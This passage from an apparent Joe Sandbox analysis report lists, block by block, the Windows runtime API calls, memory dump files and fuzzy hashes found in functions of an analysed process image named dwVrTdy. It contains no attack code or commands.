                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2641D762A1CB8181EA50BB68E5423B95321EF997D4F109230EA9C53BDADF7DD0C19700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
                                                                                                                                                                                                                                                                                          • Instruction ID: 24f6a4ccf0299e83f881ee9d59af99df723dbe2ccd50f1e2fbe363d3539d69d0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E310A21E0C24791FAD4BB6599633BD2291AF41384F44603AD95EFB2E3DF2DA447B341
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F770FC: GetLastError.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F7710B
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F770FC: SetLastError.KERNEL32(?,?,?,00007FF643F7167D,?,?,?,?,00007FF643F7A1B8,?,?,?,00007FF643F647BB), ref: 00007FF643F771AB
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00007FF643F69295,?,?,?,?,00007FF643F690D9), ref: 00007FF643F69123
                                                                                                                                                                                                                                                                                          • FreeLibraryAndExitThread.KERNEL32(?,?,?,00007FF643F69295,?,?,?,?,00007FF643F690D9), ref: 00007FF643F69139
                                                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 00007FF643F69142
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1991824761-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 269d5c32d7ddaf75b05b2a421418ecaeceb98ddcc9d5e2872db963f75b52c73d
                                                                                                                                                                                                                                                                                          • Instruction ID: 541a7b6b3ac4cf90f58db389b862fdeb6618c88abd329026a86f6f3b31c0e4a6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 269d5c32d7ddaf75b05b2a421418ecaeceb98ddcc9d5e2872db963f75b52c73d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F03C21A0C68292EF947F20844A27D2265EF48B38F280735DA3C936E4DF2CD856D340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
                                                                                                                                                                                                                                                                                          • Instruction ID: 4d413ededb3f40f578cac9c00317003d2c8768e278d188440f4612e886f8a44b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74D06C14B4C61282EB983F70689717812516F88782F40283CC91EA73E2CE3CA84AA201
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-410509341
                                                                                                                                                                                                                                                                                          • Opcode ID: f9d95cd1e88be130f568b3084bb3211d3d686bffa53d367df6312a82e2c57907
                                                                                                                                                                                                                                                                                          • Instruction ID: 645b68ccf7d431dcfaec0c13b8377fde4f06ae760321ed5e0d5ed5aeaa47dd12
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9d95cd1e88be130f568b3084bb3211d3d686bffa53d367df6312a82e2c57907
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81318462A1CBC5C1DA50AF28E5412AD6361FB997A8F505321EAAC537E9EF7CD580D300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 73155330-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 388b5addc4c8463f24de326e88e7effa5c81be76fa7155d51a4efd2038def7e5
                                                                                                                                                                                                                                                                                          • Instruction ID: 78446e9c54abb1558b3778bccead6474536645c0f014f814901dd022c4644f4b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 388b5addc4c8463f24de326e88e7effa5c81be76fa7155d51a4efd2038def7e5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F712462B0CB8682EE90EB11A54637AA355EBA5BD0F044536EE9D57BC5EF3CE0849300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
                                                                                                                                                                                                                                                                                          • Instruction ID: df648ead82817bfe97d26d8bc30cfae133773696db6f4e2298c85a428f74d269
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f58a9c92a8fce4cc72087901250097e9265e0b94835121beaf569dd45793cf4
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA51EB61B0D28146F6A8FE26944267A6690BF84BA4F155730DEBDE77C5EF3CD402A600
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
                                                                                                                                                                                                                                                                                          • Instruction ID: abfb7a79f8580d5d1fca690bdb1b01a7e1da7e2b1ff0e3fec03d89006b87f7e0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5ecb5a3e12f91ffbc86fdd52a79ab38cfde5581c6d894850847f25b81b2adf2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7641B032B0AA5585EB91AF2AD45137967A1FB44FD8F144432EE0DA7FD8DE3CD8869300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
                                                                                                                                                                                                                                                                                          • Instruction ID: f4cd271988d470d2543861c99a306d96f8cfa7f1210e60c5b1426fbd3fca80b2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04b78cf97d1ff0a22f420d264a7d88ac46121f9b2cffaf87a6c9d5deea7e0d7c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0319132A1C64281EA90FB14E4531BA3365EBD5BC0F942231E65EE77D2EF3DE106A300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF643F7BFAC,?,?,?,?,00000000,00007FF643F7C0B5), ref: 00007FF643F7C00C
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00007FF643F7BFAC,?,?,?,?,00000000,00007FF643F7C0B5), ref: 00007FF643F7C016
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
                                                                                                                                                                                                                                                                                          • Instruction ID: 87c49a46a31c1085666971756a336af8cac21882e6b5774975ae50bc7f31fe66
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18e88116976d4eed816a16a67e84bae8f7ddcce54afb00a24ad4d2b6368889b5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E11276271CB8281DAA0BB25A4050696361BB45FF4F540331EE7DA77E9DF3CD0459740
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF643F7388A,?,?,?,00007FF643F73C62,?,?,?,?,00007FF643F867E8,?,?,?), ref: 00007FF643F81A14
                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF643F7388A,?,?,?,00007FF643F73C62,?,?,?,?,00007FF643F867E8,?,?,?), ref: 00007FF643F81A7E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3328510275-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 77f4bbf60c637820e889fe764b6ad60b108e400a594c2bcf546cb670c757a277
                                                                                                                                                                                                                                                                                          • Instruction ID: 5015c0cdfedd2936218c0b175f678435ed3c6584e7f455b69f9560f98a4e6d20
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77f4bbf60c637820e889fe764b6ad60b108e400a594c2bcf546cb670c757a277
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7201C811F1C75281EAA8BF56A41206A6360EF54FE0F484330DFAE63BD9DF2CE4429340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F5DF9C: GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,00000000,00007FF643F22A65), ref: 00007FF643F5DFC2
                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF643F5DF9C: FormatMessageA.KERNEL32 ref: 00007FF643F5DFF5
                                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32 ref: 00007FF643F22AA2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FormatFreeInfoLocalLocaleMessage
                                                                                                                                                                                                                                                                                          • String ID: unknown error
                                                                                                                                                                                                                                                                                          • API String ID: 334183667-3078798498
                                                                                                                                                                                                                                                                                          • Opcode ID: dd9682ce97c1c0a7eda2dea6ee7eda1403629615652cd6638d874aff6c2c7934
                                                                                                                                                                                                                                                                                          • Instruction ID: febebcd19a577382e8f3a6e79510aebffaaba08adadf078c1a9157b477f057ec
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd9682ce97c1c0a7eda2dea6ee7eda1403629615652cd6638d874aff6c2c7934
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A501D66261CB41C0EBA0BB11F44206A77A0EBD87D8F545135EA8D97BA9DE3CD5908B00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
                                                                                                                                                                                                                                                                                          • Instruction ID: 7a1c62aa7097281d435c738e52312886980db7da96ce7347298a8ba26b8dfd13
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebcf236077280dc1a6399f02e22a1564b1da6c0fbd5af7dbc20a16d9120f82ea
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B01DB22B0C68282EB407B19B041769BB909BE43E4F144034D989C37D9DFBCD4449F00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1611280651-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
                                                                                                                                                                                                                                                                                          • Instruction ID: 4dfa2093d94f6aa2aa235ff77e7dbf202e54396a654a3f5a1c2a43c77334804a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9adcf061b8f2bb1fc30e3fc29ab42b48d7075bfc2929998413704bec6448b1cf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5F06D16E0D64282FF94BB7184471BD2260EF58B44F041034D90EE32E6DF2CA446A300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
                                                                                                                                                                                                                                                                                          • Instruction ID: eb0875633b9254bcca7dacffa004f883c95114d41c33028bb7600709e4256650
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7003ff1d198486304dd6a1b10bd0611cb7e7be912b70eb8aca42fa367c7aee25
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0EC40E1D10761FDE835E119474B900401F25B70E182B30D97DA76D3AE5CA953B211
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78356
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF643F82B26,?,?,?,00007FF643F82EA3,?,?,00000000,00007FF643F833AD,?,?,?,00007FF643F832DF), ref: 00007FF643F78360
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
